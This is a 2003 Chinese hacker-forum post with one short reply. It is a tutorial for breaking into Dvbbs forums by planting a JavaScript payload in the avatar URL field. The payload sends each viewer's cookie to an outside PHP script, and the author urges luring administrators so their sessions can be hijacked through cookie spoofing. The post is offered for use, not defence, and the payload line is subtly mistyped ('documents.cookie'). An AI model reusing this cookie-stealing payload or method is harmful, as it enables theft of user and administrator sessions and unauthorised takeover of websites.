黑色海岸线论坛 - Powered by Discuz! Board

标题: 利用动网头像漏洞入侵论坛 [打印本页]

作者: Hacker57 时间: 2003-11-22 00:10 标题: 利用动网头像漏洞入侵论坛

[这个贴子最后由Hacker57在 2003/11/22 02:11am 第 1 次编辑] 话不多说，直接进入主题！打开论坛，先申请一个ID ,然后修改此ID的基本资料，找到“自定义头像地址”一栏。嘿嘿！我这里将图象的URL地址改成一个自动蹦出有自动隐藏的窗口，而这个窗口中的php脚本的功能是获取Cookie。将如下 php脚本保存在记事本里：然后保存为******.php文件，将此脚本上传到自己的网站空间中，地址为：http://www.skyapex.net/******.php。再在论坛头像地址栏里输入如下代码： javascript:window.open('http://www.skyapex.net/******.php?'+documents.cookie) 然后提交完成。（注意：*字符号可任意取）接下来要做的就是要吸引管理员来看你发的帖子了（注意：任何人只要浏览了你发的帖子，他的Cookie都会被你截获！）那么我们就可以利用Cookie欺骗以管理员的身份登陆论坛了，具体怎么做，我就不多说了！不过我可以告诉大家，在这里我们所要用的的工具有：欺骗工具ieCookiesview

作者: hc123 时间: 2003-11-22 11:13 标题: 利用动网头像漏洞入侵论坛

看了有点晕哦

欢迎光临黑色海岸线论坛 (http://bbs.thysea.com/)